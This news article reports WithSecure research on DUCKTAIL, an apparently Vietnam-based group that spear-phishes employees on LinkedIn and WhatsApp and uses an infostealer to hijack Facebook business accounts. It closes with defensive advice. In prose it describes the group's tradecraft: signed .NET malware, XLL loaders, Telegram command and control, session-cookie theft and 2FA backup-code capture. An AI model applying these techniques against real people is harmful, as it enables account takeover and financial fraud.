A group of attackers, possibly based in Vietnam, who specialize in targeting employees with potential access to Facebook corporate and ad management accounts, has resurfaced with changes to its infrastructure, malware and modus operandi after initially being discovered a few months ago.
Dubbed DUCKTAIL by WithSecure researchers, the group uses spear phishing to target people on LinkedIn who have job descriptions that might suggest they have access to managing Facebook business accounts. More recently, attackers have also been observed targeting victims via WhatsApp. Compromised Facebook business accounts are used to post ads on the platform for the attackers’ financial gain.
DUCKTAIL attackers do their research
Account abuse is accomplished by using a victim’s browser through a malware program delivered in the form of brand, product, and project planning documents. The attackers first create a list of companies that have company pages on Facebook. They then look for employees on LinkedIn and other sources who work for those companies and have job titles that could provide them with access to those company pages. These include managerial, digital marketing, digital media and HR roles.
The final step is to send them a link to an archive that contains the malware disguised as a .pdf, along with images and videos that appear to be part of the same project. Some of the filenames seen by researchers include project “development plan”, “project information”, “products”, and “new L’Oréal budget business plan”. Some of the files included country names, prompting attackers to customize them for each victim and country based on their reconnaissance. The identified victims were scattered all over the world, so the attackers are not targeting any particular region.
The DUCKTAIL Group is believed to have been running this campaign since the second half of 2021. After WithSecure exposed their operation in August this year, the operation stopped and the attackers reworked some of their toolsets.
Attackers switch to GlobalSign as the certificate authority
The malware samples analyzed earlier this year were digitally signed with a legitimate code signing certificate obtained by Sectigo on behalf of a Vietnamese company. Since that certificate was reported and revoked, the attackers switched to GlobalSign as the certificate authority. While continuing to request certificates from multiple CAs on behalf of the original company, they also created six other businesses, all in Vietnamese, and obtained code signing certificates using three of them. Code signing certificates require extended validation (EV) where the identity of the applicant is verified through various documents.
“At the time of this writing, the threat actor has adapted to certificate revocations using timestamping as a method of countersigning via DigiCert,” WithSecure researchers said in a new report released this week.
The DUCKTAIL malware samples seen in late 2021 were written in .NET Core and were compiled using the framework’s single-file feature, which bundles all required libraries and files into a single executable file, including the main assembly. This ensures that the malware can run on any Windows computer whether or not the .NET runtime is installed. Since August 2022, when the campaign stopped, WithSecure researchers have observed multiple development DUCKTAIL samples uploaded to VirusTotal from Vietnam.
One of the examples was built using .NET 7’s NativeAOT, which provides similar functionality to the single-file feature of .NET Core, allowing early native compilation of binaries. However, NativeAOT has limited support for third-party libraries, so attackers have reverted to .NET Core.
Bad actors have experimented
Other experiments were also seen, such as including anti-parsing code from a GitHub project that never actually went live, the ability to instead send a list of email addresses as a .txt file from the command and control server to encode them in the malware and launch a dummy file when the malware runs to make the user less suspicious: dummy files of documents (.docx), spreadsheets (.xlsx), and videos (.mp4) have been observed.
Attackers are also testing multiphase loaders to distribute malware, such as an Excel add-in file (.xll), which extracts a secondary loader from an encrypted blob and then downloads the infostealer malware. The researchers also identified a downloader written in .NET that they very confidently associate with DUCKTAIL, which runs a PowerShell command that downloads the infostealer from Discord.
Infostealer malware uses Telegram channels for command and control. Attackers have better blocked these channels since they were deactivated in August, and some channels now have multiple administrators, which could suggest they are running an affiliate program similar to ransomware gangs. “This is further enhanced by the increase in chat activity and the new file encryption mechanism which ensures that only certain users will be able to decrypt certain exfiltrated files,” the researchers say.
Once distributed, the DUCKTAIL malware scans browsers installed on the system and the location of their cookie storage. It then steals all stored cookies, including any Facebook session cookies stored within. A session cookie is a small identifier set by a website within a browser after successful authentication to remember that the user is logged in for a period of time.
The malware uses the Facebook session cookie to interact directly with Facebook pages or to send requests to the Facebook Graph API for information. This information includes name, email, date of birth and user ID for personal accounts; name, verification status, ad limit, users and pending customers from Facebook business pages accessed by personal accounts; name, ID, account status, ad pay cycle, currency, DSL adtrust and amount spent for any associated Facebook Ads accounts.
The malware also checks if two-factor authentication is enabled for compromised accounts and uses the active session to obtain backup codes for two-factor authentication when enabled. “Information stolen from the victim’s machine also allows the threat actor to attempt these activities (as well as other malicious activities) from outside the victim’s machine,” the researchers said. “Information such as stolen session cookies, access tokens, 2FA codes, user agents, IP address and geolocation, as well as general account information (such as name and date of birth) could be used to cloak and impersonate the victim.”
The malware aims to attempt to add attacker-controlled email addresses to hijacked Facebook business accounts with the highest possible roles: administrator and financial writer. According to the Facebook Meta owner’s documentation, administrators have full control over the account, while financial reporters have control over the credit card information stored in the account, as well as the transactions, bills, and expenses on the account. They can also add external business to stored credit cards and monthly invoices by allowing those businesses to use the same payment method.
Impersonate identities of legitimate account managers
“In cases where the targeted victims did not have sufficient access for the malware to add the threat actor’s email addresses to their intended corporate accounts, the threat actor relied on information exfiltrated from computers and victims’ Facebook accounts to impersonate them and achieve their post-compromise goals through hands-on activities,” the researchers said in their new report.
In one case investigated by WithSecure rescuers, the victim used an Apple computer and had never logged into Facebook from a Windows computer. No malware was found on the system and the initial access vector could not be determined. Whether this was related to DUCKTAIL is unclear, but researchers determined that the attackers were also from Vietnam.
Facebook Business admins are advised to regularly review users added in Business Manager > Settings > People and revoke access to any unknown users who have been granted admin access or financial writer roles.
“Through our investigations, the WithSecure Incident Response team discovered that the business history logs and Facebook data of the targeted individuals were relevant to the incident analysis,” the researchers said. “However, for logs relating to an individual’s Facebook account, there are widely inconsistencies between what is visible on the web portal versus what one would get by downloading a copy of their data. As a recommendation to other investigators, the WithSecure Incident Response team strongly recommends that you acquire a local copy of your business history logs as soon as possible and request a copy of your user data for your account.